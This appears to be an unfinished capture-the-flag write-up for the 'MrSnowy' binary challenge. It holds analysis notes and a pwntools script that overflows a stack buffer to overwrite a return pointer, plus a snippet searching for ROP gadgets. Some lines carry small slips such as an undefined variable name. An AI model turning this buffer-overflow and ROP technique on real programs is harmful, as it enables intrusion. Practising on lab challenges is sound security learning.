# MrSnowy

There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing.
But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house.
Something must be wrong with him.

## Flag

Not pwned

## Progress so far

![vulnerable function](images/investigate.png)

- The `read()` reads 0x108 bytes of input from stdin
  - The buffer is uninitialized
  - The functioncall sits at `*investigate+67`
- The Stackframe of the function only has a size of 0x40 bytes
- `checksec --file=mrsnowy` reports NX being enabled
  - So no shellcode will be placable unless there is executable space
  - This hints to ROP Chaining


![dissasembly of investigate function](images/investigate_disass.png)

- The binary should be patched to get rid of the timetaking animation
  - Just `nop` the banner() function call using radare2
- Overwriting the returnpointer of `investigate()` using pwntools:

```python
context(arch='x86_64', os='linux')
context.terminal = ['/usr/bin/alacritty', '-e']
e = ELF("mr_snowy")
p = process(e.path)

# read banner and stuff until input is requested
def do_read():
  while True:
     ll = p.read()
     print(ll)
     if b'>' in ll:
       break

# if not patched wait for the animation and send 1
do_read()
p.sendline('1')
do_read()

# write 0x48 bytes and overwrite the return pointer to the top of the stackframe
p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))

# start the python debugger to get a coredump which is loadable by gdb
ipdb.set_trace()
```

- Trying to find ROP Gadgets using pwntools

```python
e = ELF("mr_snowy")
rop = ROP(elf)
rop.rbx
rop.gadgets
```